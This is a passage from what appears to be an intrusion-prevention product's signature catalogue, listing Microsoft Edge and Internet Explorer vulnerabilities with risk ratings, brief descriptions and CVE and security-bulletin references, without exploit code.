HTTP_CRL-Microsoft-Dynamics-AX-Cross-Site-Scripting-Vulnerability

References:

CVE-2012-1857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1857

MS12-040
http://technet.microsoft.com/security/bulletin/MS12-040

Microsoft-Edge-And-Internet-Explorer-Chakra-CVE-2018-8145-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1130-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability has been reported in Microsoft Edge's and Microsoft Internet Explorer's Chakra JavaScript Engine. The vulnerability is due to incorrect optimization of loops with induction variables by the Chakra JIT engine. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Edge-And-Internet-Explorer-Chakra-CVE-2018-8145-Heap-Buffer-Overflow

References:

CVE-2018-8145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8145

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Edge-And-Internet-Explorer-CVE-2016-3326-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer and Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-789-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0; Microsoft Edge

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Edge and Internet Explorer. A remote, unauthenticated attacker could use this to access sensitive information on the target system.

Situation:

File-Text_Microsoft-Edge-And-Internet-Explorer-CVE-2016-3326-Use-After-Free

References:

CVE-2016-3326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3326

MS16-096
http://technet.microsoft.com/security/bulletin/MS16-096

Microsoft-Edge-And-Internet-Explorer-Information-Disclosure-CVE-2017-8529

About this vulnerability:

Microsoft Edge And Internet Explorer Information Disclosure CVE-2017-8529 vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-930-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer

Type:

Malfunction

Description:

A information discolsure vulnerability in Microsoft Edge and Internet Explorer which enables remote attackers to detect specific files on the remote system through window.print().

Situation:

File-Text_Microsoft-Edge-And-Internet-Explorer-Information-Disclosure-CVE-2017-8529

References:

CVE-2017-8529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8529

ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun

Microsoft-Edge-Array.join-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-816-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion execution vulnerability in the Microsoft Edge scripting engine. A remote attacker can use this to disclose information or execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Array.join-Type-Confusion

References:

CVE-2016-7189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7189

MS16-119
http://technet.microsoft.com/security/bulletin/MS16-119

Microsoft-Edge-Asm.js-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-894-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in the Microsoft Edge Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Asm.js-Type-Confusion

References:

CVE-2017-0093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0093

ms17-apr
http://technet.microsoft.com/security/bulletin/ms17-apr

Microsoft-Edge-Asmjsinterpreter-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-983-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Asmjsinterpreter-Use-After-Free

References:

CVE-2017-8603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8603

ms17-aug
http://technet.microsoft.com/security/bulletin/ms17-aug

Microsoft-Edge-Boxstackinstance-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

There has been reported a type confusion vulnerability in Microsoft Edge Chakra JavaScript Engine. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Boxstackinstance-Type-Confusion

References:

CVE-2018-0934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0934

Microsoft-Edge-Buffer-Overrun-Vulnerability-CVE-2019-0642

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a buffer overrun vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Buffer-Overrun-Vulnerability-CVE-2019-0642

References:

CVE-2019-0642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0642

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Chakra-Arguments-Off-By-One

About this vulnerability:

A vulnerability in Windows

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A vulnerability in Windows

Situation:

File-Text_Microsoft-Edge-Chakra-Arguments-Off-By-One

References:

CVE-2017-8671
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8671

Microsoft-Edge-Chakra-Array.map-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-819-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion execution vulnerability in the Microsoft Edge scripting engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Chakra-Array.map-Type-Confusion

References:

CVE-2016-7190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7190

MS16-119
http://technet.microsoft.com/security/bulletin/MS16-119

Microsoft-Edge-Chakra-Array.shift-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-835-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge's scripting engine Chakra. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Chakra-Array.shift-Type-Confusion

References:

CVE-2016-7201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7201

MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129

Microsoft-Edge-Chakra-Asmjsbytecodegenerator-Emitcall-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1045-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There has been reported a type confusion vulnerability Microsoft Edge's JavaScript engine. This vulnerability can be exploited by having a target user open maliciously crafted web page.

Situation:

File-Text_Microsoft-Edge-Chakra-Asmjsbytecodegenerator-Emitcall-Type-Confusion

References:

CVE-2018-0780
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0780

Microsoft-Edge-Chakra-Eval-CVE-2017-8636-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Microsoft Edge Chakra JavaScript Engine. A remote attacker could use this to execute arbitrary code in the security context of the target user.

Situation:

File-Text_Microsoft-Edge-Chakra-Eval-CVE-2017-8636-Integer-Overflow

References:

CVE-2017-8636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8636

ms17-aug
http://technet.microsoft.com/security/bulletin/ms17-aug

Microsoft-Edge-Chakra-Eval-Integer-Overflow-CVE-2017-8641

About this vulnerability:

A vulnerability in Microsoft Edge Chakra

Risk:

High

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Integer Overflow

Description:

An integer overflow vulnerability in Microsoft Edge Chakra which allows remote attackers to execute arbitrary code by sending a specially crafted web page with an overly large argument being sent to the eval() function.

Situation:

File-Text_Microsoft-Edge-Chakra-Eval-Integer-Overflow-CVE-2017-8641

References:

CVE-2017-8641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8641

Microsoft-Edge-Chakra-Inlinearraypush-Inlinearraypop-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1142-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There has been reported a type confusion vulnerability in Microsoft Edge Chakra JavaScript Engine. Successful exploitation can lead in arbitrary code execution.

Situation:

File-Text_Microsoft-Edge-Chakra-Inlinearraypush-Inlinearraypop-Type-Confusion

References:

CVE-2018-8617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8617

Microsoft-Edge-Chakra-JavaScript-Engine-CVE-2016-0193-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-764-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge Chakra JavaScript Engine. A successful exploitation can lead to arbitrary code execution.

Situation:

File-Text_Microsoft-Edge-Chakra-JavaScript-Engine-CVE-2016-0193-Memory-Corruption

References:

CVE-2016-0193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0193

MS16-052
http://technet.microsoft.com/security/bulletin/MS16-052

Microsoft-Edge-Chakra-LowerBoundCheck-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Edge and ChakraCore

Risk:

High

First detected in:

sgpkg-ips-1081-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; ChakraCore

Type:

Malfunction

Description:

An integer overflow vulnerability in Microsoft Edge and ChakraCore exists that allows an attacker to gain the same user rights as the current user due to how the scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.

Situation:

File-Text_Microsoft-Edge-Chakra-LowerBoundCheck-Integer-Overflow

References:

CVE-2017-11861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11861

BID-101723
http://www.securityfocus.com/bid/101723

Microsoft-Edge-Chakra-Method-Propertystring-Object-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-867-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge's JavaScript engine Chakra. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Chakra-Method-Propertystring-Object-Type-Confusion

References:

CVE-2017-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0094

MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007

Microsoft-Edge-Chakra-MinInAnArray-MaxInAnArray-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

A vulnerability in Microsoft Edge Chakra JavaScript Engine which allows remote attackers to execute arbitrary code by sending a specially crafted web page or document, due to insufficient validation within the MinInAnArray() and MaxInAnArray() functions.

Situation:

File-Text_Microsoft-Edge-Chakra-MinInAnArray-MaxInAnArray-Type-Confusion

References:

CVE-2017-11893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11893

Microsoft-Edge-Chakra-NewScObjectNoCtor-InitProtoType-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1142-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

A type confusion vulnerability has been reported in Microsoft Edge Chakra JavaScript Engine. The vulnerability is due to insufficient validation when running the InitProtoType or InitProtoType opcodes. A remote attacker could exploit these vulnerabilities by enticing the target user to open a specially crafted web page or document. Successful exploitation, in the worst case, could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Microsoft-Edge-Chakra-NewScObjectNoCtor-InitProtoType-Confusion

References:

CVE-2019-0567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0567

Microsoft-Edge-Chakra-OP_memset-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1053-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There has been reported a type confusion vulnerability in Microsoft Edge Chakra JavaScript Engine. Successful exploitation could lead to arbitrary code execution.

Situation:

File-Text_Microsoft-Edge-Chakra-OP_memset-Type-Confusion

References:

CVE-2017-11873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11873

Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8466

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8466

References:

CVE-2018-8466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8466

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep

Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8467

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8467

References:

CVE-2018-8467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8467

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep

Microsoft-Edge-Chakra-Templatedforeachiteminrange-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-816-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in the Chakra component of Microsoft Edge. A remote attacker can use this to disclose sensitive memory contents.

Situation:

File-Text_Microsoft-Edge-Chakra-Templatedforeachiteminrange-Type-Confusion

References:

CVE-2016-7194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7194

MS16-119
http://technet.microsoft.com/security/bulletin/MS16-119

Microsoft-Edge-Chakra-Todefiniteanynumber-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1053-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There has been reported a type confusion vulnerability in Microsoft Edge Chakra JavaScript Engine. Successful exploitation could lead to arbitrary code execution.

Situation:

File-Text_Microsoft-Edge-Chakra-Todefiniteanynumber-Type-Confusion

References:

CVE-2017-11840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11840

Microsoft-Edge-Chakra-Type-Confusion-Suspected-Exploit

About this vulnerability:	A vulnerability in Microsoft Edge
Risk:	High
First detected in:	sgpkg-ips-1043-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Microsoft Edge
Type:	Input Validation
Description:	A certain float value has been associated with multiple exploits against the Chakra scripting engine in Microsoft Edge.
Situation:	File-Text_Microsoft-Edge-Chakra-Type-Confusion-Suspected-Exploit

Microsoft-Edge-Code-Execution-CVE-2015-6168

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Edge Detected

Risk:

Moderate

First detected in:

sgpkg-ips-711-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Edge Detected

Situation:

File-Text_Microsoft-Edge-Code-Execution-CVE-2015-6168

References:

CVE-2015-6168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6168

MS15-125
http://technet.microsoft.com/security/bulletin/MS15-125

Microsoft-Edge-Code-Execution-CVE-2015-6170

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Edge Detected

Risk:

Moderate

First detected in:

sgpkg-ips-711-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Edge Detected

Situation:

File-Text_Microsoft-Edge-XSS-CVE-2015-6170

References:

CVE-2015-6170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6170

MS15-125
http://technet.microsoft.com/security/bulletin/MS15-125

Microsoft-Edge-Coptionscollectioncacheitem-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An out-of-bounds read vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-Coptionscollectioncacheitem-Out-Of-Bounds-Read

References:

CVE-2017-8734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8734

Microsoft-Edge-CVE-2015-2442

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-668-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

A vulnerability in Microsoft Edge

Situation:

File-Text_Microsoft-Edge-CVE-2015-2442

References:

CVE-2015-2442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2442

MS15-091
http://technet.microsoft.com/security/bulletin/MS15-091

Microsoft-Edge-CVE-2015-2446

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-668-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

A vulnerability in Microsoft Edge

Situation:

File-Text_Microsoft-Edge-CVE-2015-2446

References:

CVE-2015-2442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2442

MS15-091
http://technet.microsoft.com/security/bulletin/MS15-091

Microsoft-Edge-CVE-2015-6064

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Edge detected

Risk:

Low

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Edge

Situation:

File-Text_Microsoft-Edge-CVE-2015-6064

References:

CVE-2015-6064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6064

MS15-113
http://technet.microsoft.com/security/bulletin/MS15-113

Microsoft-Edge-CVE-2016-0003-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-CVE-2016-0003-Type-Confusion

References:

CVE-2016-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0003

MS16-002
http://technet.microsoft.com/security/bulletin/MS16-002

Microsoft-Edge-CVE-2016-0161-Privilege-Escalation

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-756-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

There exists a privilege escalation vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-CVE-2016-0161-Privilege-Escalation

References:

CVE-2016-0161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0161

MS16-038
http://technet.microsoft.com/security/bulletin/MS16-038

Microsoft-Edge-CVE-2016-3222-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-774-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

A vulnerability in Microsoft Edge, in Windows 10 version 1511, which allows remote attackers to execute arbitrary code or cause a denial of service condition via a crafted website.

Situation:

File-Text_Microsoft-Edge-CVE-2016-3222-Memory-Corruption

References:

CVE-2016-3222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3222

MS16-068
http://technet.microsoft.com/security/bulletin/MS16-068

Microsoft-Edge-CVE-2016-3244-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-780-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

A vulnerability in Microsoft Edge

Situation:

File-Text_Microsoft-Edge-CVE-2016-3244-Information-Disclosure

References:

CVE-2016-3244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3244

MS16-085
http://technet.microsoft.com/security/bulletin/MS16-085

Microsoft-Edge-CVE-2016-7200

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-819-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

A vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-CVE-2016-7200

References:

CVE-2016-7200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7200

MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129

Microsoft-Edge-CVE-2016-7206

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-834-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

There exists an information disclosure vulnerability in Microsoft Edge. A remote attacker can use this to disclose a targets browser history.

Situation:

HTTP_CRL-Microsoft-Edge-CVE-2016-7280
File-Text_Microsoft-Edge-CVE-2016-7206

References:

CVE-2016-7206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7206

MS16-145
http://technet.microsoft.com/security/bulletin/MS16-145

Microsoft-Edge-CVE-2016-7242

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-819-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

A vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-CVE-2016-7242

References:

CVE-2016-7242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7242

MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129

Microsoft-Edge-CVE-2016-7286-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-835-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-CVE-2016-7286-Memory-Corruption

References:

CVE-2016-7286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7286

MS16-145
http://technet.microsoft.com/security/bulletin/MS16-145

Microsoft-Edge-CVE-2016-7287

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-834-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a vulnerability in Microsoft Edge. Successful exploitation may permit an attacker to bypass browser security features.

Situation:

File-Text_Microsoft-Edge-CVE-2016-7287

References:

CVE-2016-7287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7287

MS16-144
http://technet.microsoft.com/security/bulletin/MS16-144

Microsoft-Edge-CVE-2017-0023

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Edge

Situation:

File-PDF_Microsoft-Edge-CVE-2017-0023

References:

CVE-2017-0023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0023

MS17-008
http://technet.microsoft.com/security/bulletin/MS17-008

Microsoft-Edge-CVE-2017-0065-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-866-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Microsoft Edge. A remote attacker can use this to gain access to sensitive information.

Situation:

File-Text_Microsoft-Edge-CVE-2017-0065-Information-Disclosure

References:

CVE-2017-0065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0065

MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007

Microsoft-Edge-CVE-2017-0070-Getter-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-892-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-CVE-2017-0070-Getter-Use-After-Free

References:

CVE-2017-0070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0070

Microsoft-Edge-CVE-2017-8652-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-992-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Edge. A remote attacker can use this to gain access to sensitive information.

Situation:

File-Text_Microsoft-Edge-CVE-2017-8652-Use-After-Free

References:

CVE-2017-8652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8652

ms17-aug
http://technet.microsoft.com/security/bulletin/ms17-aug

Microsoft-Edge-Document.domain-Same-Origin-Policy-Bypass

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-842-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a policy bypass vulnerability in Microsoft Edge. A remote attacker can use this to disclose sensitive information.

Situation:

File-Text_Microsoft-Edge-Document.domain-Same-Origin-Policy-Bypass

References:

CVE-2017-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0002

MS17-001
http://technet.microsoft.com/security/bulletin/MS17-001

Microsoft-Edge-Doloopbodystart-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1010-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

A remote attacker could exploit this out-of-bounds vulnerability to get arbitrary code execution in the context of the target user.

Situation:

File-Text_Microsoft-Edge-Doloopbodystart-Out-Of-Bounds-Read

References:

CVE-2017-11811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11811

Microsoft-Edge-Elevation-of-Privilege-CVE-2019-0566

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1124-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a elevation of privilege vulnerability in Microsoft Edge. This vulnerability can be used to cause a violation in the session boundary on the affected system.

Situation:

